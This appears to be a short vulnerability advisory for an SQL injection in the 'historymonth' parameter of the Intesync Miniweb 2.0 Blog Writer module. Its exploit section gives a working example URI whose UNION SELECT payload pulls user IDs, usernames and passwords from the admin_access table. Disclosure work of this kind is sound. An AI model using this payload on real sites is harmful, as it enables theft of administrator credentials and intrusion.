Intesync LLC Miniweb 2.0 Blog Writer Module 'historymonth' Parameter SQL Injection Vulnerability

info
discussion
exploit
solution
references

Intesync LLC Miniweb 2.0 Blog Writer Module 'historymonth' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://example.com/miniweb2/index.php?module=blogwriter&historyyear=2007&historymonth=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,user_id,username,password),4,5,6,7,8,9,10/**/from/**/admin_access/*